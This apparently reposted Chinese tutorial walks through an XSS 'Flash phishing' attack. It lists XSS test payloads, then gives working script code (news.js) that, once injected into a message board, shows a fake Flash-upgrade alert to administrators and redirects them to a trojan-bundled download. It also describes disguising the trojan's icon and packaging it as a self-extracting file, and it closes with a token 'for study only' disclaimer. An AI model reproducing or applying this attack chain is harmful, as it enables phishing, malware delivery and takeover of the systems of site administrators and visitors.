Xss“實戰”flash釣魚


0x01 找到存在注入的目標站點

    

2、檢測方法

通常有一些方式可以測試網站是否有正確處理特殊字符:

  • ><script>alert(document.cookie)</script>
  • ='><script>alert(document.cookie)</script>
  • "><script>alert(document.cookie)</script>
  • <script>alert(document.cookie)</script>
  • <script>alert (vulnerable)</script>
  • %3Cscript%3Ealert('XSS')%3C/script%3E
  • <script>alert('XSS')</script>
  • <img src="javascript:alert('XSS')">
  • <img src="http://888.888.com/999.png" onerror="alert('XSS')">
  • <div style="height:expression(alert('XSS'),1)"></div>(這個僅於IE7(含)之前有效)

2、攻擊思路  

站點含有Xss漏洞,但現在大部分站點都使用了Httponly,因此暫且無法劫持Cookie。此時可以進行Xss釣魚,偽造登陸界面,獲取管理賬號密碼,提升權、訪問量極大的一些頁面上的XSS可以攻擊一些小型網站,實現DOS攻擊的效果.

修改官方頁面源碼

 

 設計好用於迷惑目標點擊觸發的頁面,購買一個相似的域名。把腳本代碼插入到留言或者可以與目標活動的地方。

<script src="https://www.test.flash.com/news.js"> </script>

 

 news.js

    window.alert = function(name){
    var iframe = document. createElement("IFRAME");
    iframe.style.display="none";
    iframe.setAttribute("src",'data:text/plain,');
    document. documentElement.appendChild(iframe);
    window.frames [0].window.alert(name);
    iframe.parentNode.removeChild(iframe);
    }
    alert( "您的FLASH版本過低,嘗試升級后訪問該頁面! ");
    window. location.href="http://www.test.com";

管理員查看留言回復時彈出提示,點擊便會下載運行后便會觸發木馬程序

 

跳轉到我們捆綁好木馬的flash下載地址

 

0x02捆綁木馬制作

 

 

 

 

 

 

 

 

修改文件圖標 使用工具

 

 

 

 

下載地址:http://www.angusj.com/resourcehacker/#download

 

 完成后文件可以自解壓然后運行

目標觸發木馬獲取到權限后可以修改news.js,此時網頁不再可訪。

嚴格遵守網絡安全法,請勿用於其他非法途徑!此文用於學習交流。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM